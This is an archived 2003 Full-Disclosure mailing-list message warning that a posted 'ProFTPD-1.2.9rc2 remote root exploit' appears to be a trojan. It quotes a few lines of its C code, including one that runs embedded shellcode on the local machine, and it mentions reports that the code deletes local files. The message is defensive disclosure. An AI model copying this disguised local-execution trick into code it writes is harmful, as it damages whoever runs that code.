[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <6B67002C3FDED3119E5F00508B95969710E95445@TOCOMEXC15>
From: lionel.garcia at airbus.com (GARCIA Lionel)
Subject: ProFTPD-1.2.9rc2 remote root exploit
This line seems suspicious. Don't know the purpose of the shellcode, but I
won't try it.
/* connect to the bindshell */
printf("Trying to connect, please wait...\n");
---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\
if(give_me_a_shell(addr) < 0)
{
fprintf(stderr, "Sorry, exploit didn't work.\n");
return(-1);
The shellcode seems to be locally launched. Anybody to "decrypt" the
shellcode ?
> -----Message d'origine-----
> De : Andreas Gietl [mailto:a.gietl@...dmin.de]
> Envoy? : vendredi 24 octobre 2003 15:36
> ? : Jean-Kevin Grosnakeur; full-disclosure@...ts.netsys.com
> Objet : Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
>
>
> On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
>
> this seems to delete sth on the local harddisk. anybody else
> seeing this
> effect?
>
> > Ladies and gentlemen, here's the source code of the exploit
> for the latest
> > release of ProFTPD. This is a Zero-Day private exploit, please DON'T
> > REDISTRIBUTE. I will not take responsibility for any
> damages which could
> > result from the usage of this exploit, use it at your own risk.
> >
> >
> --------------------------------------------------------------
> ------------
> >
> > Have fun ! @+
> >
> > _________________________________________________________________
> > MSN Messenger 6 http://g.msn.fr/FR1001/866 : plus de
> personnalisation,
> > plus de fun pour vous et vos amis...
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> e-admin internet gmbh
> Andreas Gietl tel
> +49 941 3810884
> Ludwig-Thoma-Strasse 35 fax +49
> (0)1805/39160 - 29104
> 93051 Regensburg mobil +49
> 171 6070008
>
> PGP/GPG-Key unter http://www.e-admin.de/gpg.html
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> This mail has originated outside your organization,
> either from an external partner or the Global Internet.
> Keep this in mind if you answer this message.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031024/c83a8372/attachment.html
Powered by blists - more mailing lists